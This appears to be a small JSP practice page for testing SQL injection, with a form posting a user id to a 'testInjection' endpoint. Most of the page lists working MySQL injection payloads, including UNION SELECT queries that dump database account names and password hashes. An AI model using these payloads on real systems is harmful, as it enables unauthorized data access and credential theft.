<%@ page language="java" contentType="text/html; charset=utf-8"
    pageEncoding="utf-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>sql注入测试</title>
</head>
<body>
注入用户Id:</br>
查询全部数据：1 or 1=1</br>
推测表名：1 or 1=(select count(*) from users)</br>
数据库版本：2 and 1=2 union select version(),user(),database()</br>
排序,推测列： 2 order by 4</br>
占位查看字段在页面对应的具体的输出:1 and 1=2 union select 1,2,3,user()</br>
1 and 1=2 union select 1,2,3,CONCAT('MysqlUser:',User,'------MysqlPassword:',Password) FROM mysql.`user` limit 0</br>
1 and 1=2 union select 1,2,3,GROUP_CONCAT('MysqlUser:',User,'------MysqlPassword:',Password) FROM mysql.`user` limit 0,1
<form action="testInjection" method="post">
		用户id：<input type="text" name="userId" value=""  />
		<input type="submit" value="提交" />
</form>
</body>
</html>